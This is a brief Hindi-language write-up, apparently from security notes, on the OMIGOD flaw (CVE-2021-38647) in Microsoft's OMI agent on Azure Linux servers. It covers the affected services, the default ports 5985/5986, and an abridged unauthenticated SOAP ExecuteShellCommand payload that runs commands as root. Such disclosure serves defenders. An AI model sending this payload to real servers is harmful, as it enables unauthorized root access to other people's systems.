मूलभूत जानकारी

OMI को माइक्रोसॉफ्ट द्वारा ओपन-सोर्स उपकरण के रूप में प्रस्तुत किया गया है, जो रिमोट कॉन्फ़िगरेशन प्रबंधन के लिए डिज़ाइन किया गया है। यह खासकर उन लिनक्स सर्वरों के लिए महत्वपूर्ण है जो एज़्यूर पर होते हैं और जो सेवाएं उपयोग करते हैं जैसे:

• एज़्यूर ऑटोमेशन

• एज़्यूर ऑटोमेटिक अपडेट

• एज़्यूर ऑपरेशन्स मैनेजमेंट स्यूट

• एज़्यूर लॉग विश्लेषण

• एज़्यूर कॉन्फ़िगरेशन मैनेजमेंट

• एज़्यूर डायाग्नोस्टिक्स

जब ये सेवाएं सक्रिय होती हैं, तो प्रक्रिया omiengine प्रारंभ होती है और जब सभी इंटरफेस पर सुनवाई करती है।

डिफ़ॉल्ट पोर्ट का उपयोग किया जाता है 5985 (http) और 5986 (https).

CVE-2021-38647 सुरक्षा दोष

16 सितंबर को देखा गया कि एज़्यूर में डिप्लॉय किए गए लिनक्स सर्वर जिनमें उल्लिखित सेवाएं हैं, OMI के एक वंशानुक्रम संस्करण के कारण संक्रमित हो सकते हैं। यह सुरक्षा दोष OMI सर्वर के /wsman एंडपॉइंट के माध्यम से संदेशों का हैंडलिंग करने में है, जिसमें एक प्रमाणीकरण हेडर की आवश्यकता नहीं होती, ग्राहक को गलत रूप से अधिकृत करते हैं।

हमलावर इसे एक "ExecuteShellCommand" SOAP पेलोड भेजकर इसका शोषण कर सकता है बिना किसी प्रमाणीकरण हेडर के, सर्वर को जड़ प्रिविलेज के साथ कमांड निष्पादित करने के लिए।

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

संदर्भ

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/